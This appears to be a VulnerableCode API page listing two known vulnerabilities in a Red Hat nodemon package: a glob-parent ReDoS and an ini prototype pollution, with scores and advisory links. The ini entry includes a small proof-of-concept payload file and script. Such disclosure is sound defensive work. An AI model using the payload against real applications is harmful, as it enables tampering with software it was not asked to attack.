Django REST framework

Package Instance

Lookup for vulnerable packages by Package URL.

Purlpkg:rpm/redhat/rh-nodejs14-nodejs-nodemon@2.0.3-5?arch=el7
Typerpm
Namespaceredhat
Namerh-nodejs14-nodejs-nodemon
Version2.0.3-5
Qualifiers
arch el7
Subpath
Is_vulnerabletrue
Next_non_vulnerable_versionnull
Latest_non_vulnerable_versionnull
Affected_by_vulnerabilities
0
url VCID-4f1w-xpyy-2fcf
vulnerability_id VCID-4f1w-xpyy-2fcf
summary 
glob-parent vulnerable to Regular Expression Denial of Service in enclosure regex
This affects the package glob-parent before 5.1.2. The enclosure regex used to check for strings ending in enclosure containing path separator.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-28469.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-28469.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-28469
reference_id
reference_type
scores
0
value 0.00888
scoring_system epss
scoring_elements 0.75446
published_at 2026-04-07T12:55:00Z
1
value 0.00888
scoring_system epss
scoring_elements 0.75465
published_at 2026-04-04T12:55:00Z
2
value 0.00888
scoring_system epss
scoring_elements 0.75434
published_at 2026-04-02T12:55:00Z
3
value 0.00888
scoring_system epss
scoring_elements 0.75431
published_at 2026-04-01T12:55:00Z
4
value 0.00913
scoring_system epss
scoring_elements 0.75887
published_at 2026-04-11T12:55:00Z
5
value 0.00913
scoring_system epss
scoring_elements 0.75868
published_at 2026-04-12T12:55:00Z
6
value 0.00913
scoring_system epss
scoring_elements 0.75851
published_at 2026-04-08T12:55:00Z
7
value 0.00913
scoring_system epss
scoring_elements 0.75863
published_at 2026-04-09T12:55:00Z
8
value 0.00991
scoring_system epss
scoring_elements 0.76932
published_at 2026-04-18T12:55:00Z
9
value 0.00991
scoring_system epss
scoring_elements 0.76924
published_at 2026-04-21T12:55:00Z
10
value 0.00991
scoring_system epss
scoring_elements 0.76886
published_at 2026-04-13T12:55:00Z
11
value 0.00991
scoring_system epss
scoring_elements 0.76928
published_at 2026-04-16T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-28469
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28469
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28469
3
reference_url https://github.com/gulpjs/glob-parent
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/gulpjs/glob-parent
4
reference_url https://github.com/gulpjs/glob-parent/blob/6ce8d11f2f1ed8e80a9526b1dc8cf3aa71f43474/index.js%23L9
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/gulpjs/glob-parent/blob/6ce8d11f2f1ed8e80a9526b1dc8cf3aa71f43474/index.js%23L9
5
reference_url https://github.com/gulpjs/glob-parent/commit/4a80667c69355c76a572a5892b0f133c8e1f457e
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/gulpjs/glob-parent/commit/4a80667c69355c76a572a5892b0f133c8e1f457e
6
reference_url https://github.com/gulpjs/glob-parent/pull/36
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/gulpjs/glob-parent/pull/36
7
reference_url https://github.com/gulpjs/glob-parent/pull/36/commits/c6db86422a9731d4f3d332ce4a81c27ea6b0ee46
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/gulpjs/glob-parent/pull/36/commits/c6db86422a9731d4f3d332ce4a81c27ea6b0ee46
8
reference_url https://github.com/gulpjs/glob-parent/releases/tag/v5.1.2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/gulpjs/glob-parent/releases/tag/v5.1.2
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-28469
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-28469
10
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBES128-1059093
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBES128-1059093
11
reference_url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059092
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1059092
12
reference_url https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905
13
reference_url https://www.oracle.com/security-alerts/cpujan2022.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2022.html
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1945459
reference_id 1945459
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1945459
15
reference_url https://github.com/advisories/GHSA-ww39-953v-wcq6
reference_id GHSA-ww39-953v-wcq6
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-ww39-953v-wcq6
16
reference_url https://access.redhat.com/errata/RHSA-2021:2438
reference_id RHSA-2021:2438
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2438
17
reference_url https://access.redhat.com/errata/RHSA-2021:2865
reference_id RHSA-2021:2865
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2865
18
reference_url https://access.redhat.com/errata/RHSA-2021:3280
reference_id RHSA-2021:3280
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3280
19
reference_url https://access.redhat.com/errata/RHSA-2021:3281
reference_id RHSA-2021:3281
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3281
20
reference_url https://access.redhat.com/errata/RHSA-2021:4626
reference_id RHSA-2021:4626
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4626
21
reference_url https://access.redhat.com/errata/RHSA-2021:5171
reference_id RHSA-2021:5171
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:5171
22
reference_url https://access.redhat.com/errata/RHSA-2022:0246
reference_id RHSA-2022:0246
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0246
23
reference_url https://access.redhat.com/errata/RHSA-2022:0350
reference_id RHSA-2022:0350
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0350
24
reference_url https://access.redhat.com/errata/RHSA-2022:6595
reference_id RHSA-2022:6595
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:6595
fixed_packages
aliases CVE-2020-28469, GHSA-ww39-953v-wcq6
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4f1w-xpyy-2fcf
1
url VCID-7tyw-ppyt-zqgr
vulnerability_id VCID-7tyw-ppyt-zqgr
summary 
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
### Overview
The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.

### Patches

This has been patched in 1.3.6.

### Steps to reproduce

payload.ini
```
[__proto__]
polluted = "polluted"
```

poc.js:
```
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
```

```
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7788.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-7788.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-7788
reference_id
reference_type
scores
0
value 0.00291
scoring_system epss
scoring_elements 0.5253
published_at 2026-04-21T12:55:00Z
1
value 0.00291
scoring_system epss
scoring_elements 0.52398
published_at 2026-04-01T12:55:00Z
2
value 0.00291
scoring_system epss
scoring_elements 0.52444
published_at 2026-04-02T12:55:00Z
3
value 0.00291
scoring_system epss
scoring_elements 0.52471
published_at 2026-04-04T12:55:00Z
4
value 0.00291
scoring_system epss
scoring_elements 0.52437
published_at 2026-04-07T12:55:00Z
5
value 0.00291
scoring_system epss
scoring_elements 0.52489
published_at 2026-04-08T12:55:00Z
6
value 0.00291
scoring_system epss
scoring_elements 0.52484
published_at 2026-04-09T12:55:00Z
7
value 0.00291
scoring_system epss
scoring_elements 0.52535
published_at 2026-04-11T12:55:00Z
8
value 0.00291
scoring_system epss
scoring_elements 0.52518
published_at 2026-04-12T12:55:00Z
9
value 0.00291
scoring_system epss
scoring_elements 0.52502
published_at 2026-04-13T12:55:00Z
10
value 0.00291
scoring_system epss
scoring_elements 0.52541
published_at 2026-04-16T12:55:00Z
11
value 0.00291
scoring_system epss
scoring_elements 0.52546
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-7788
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
3
reference_url https://github.com/npm/ini
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/ini
4
reference_url https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
5
reference_url https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-7788
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-7788
7
reference_url https://snyk.io/vuln/SNYK-JS-INI-1048974
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://snyk.io/vuln/SNYK-JS-INI-1048974
8
reference_url https://www.npmjs.com/advisories/1589
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.npmjs.com/advisories/1589
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1907444
reference_id 1907444
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1907444
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977718
reference_id 977718
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977718
11
reference_url https://github.com/advisories/GHSA-qqgx-2p2h-9c37
reference_id GHSA-qqgx-2p2h-9c37
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qqgx-2p2h-9c37
12
reference_url https://access.redhat.com/errata/RHSA-2021:0421
reference_id RHSA-2021:0421
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0421
13
reference_url https://access.redhat.com/errata/RHSA-2021:0485
reference_id RHSA-2021:0485
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0485
14
reference_url https://access.redhat.com/errata/RHSA-2021:0521
reference_id RHSA-2021:0521
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0521
15
reference_url https://access.redhat.com/errata/RHSA-2021:0548
reference_id RHSA-2021:0548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0548
16
reference_url https://access.redhat.com/errata/RHSA-2021:0549
reference_id RHSA-2021:0549
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0549
17
reference_url https://access.redhat.com/errata/RHSA-2021:0551
reference_id RHSA-2021:0551
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:0551
18
reference_url https://access.redhat.com/errata/RHSA-2021:3280
reference_id RHSA-2021:3280
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3280
19
reference_url https://access.redhat.com/errata/RHSA-2021:3281
reference_id RHSA-2021:3281
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3281
20
reference_url https://access.redhat.com/errata/RHSA-2021:5171
reference_id RHSA-2021:5171
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:5171
21
reference_url https://access.redhat.com/errata/RHSA-2022:0246
reference_id RHSA-2022:0246
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0246
22
reference_url https://access.redhat.com/errata/RHSA-2022:0350
reference_id RHSA-2022:0350
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:0350
23
reference_url https://access.redhat.com/errata/RHSA-2022:6595
reference_id RHSA-2022:6595
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:6595
fixed_packages
aliases CVE-2020-7788, GHSA-qqgx-2p2h-9c37
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7tyw-ppyt-zqgr
Fixing_vulnerabilities
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rh-nodejs14-nodejs-nodemon@2.0.3-5%3Farch=el7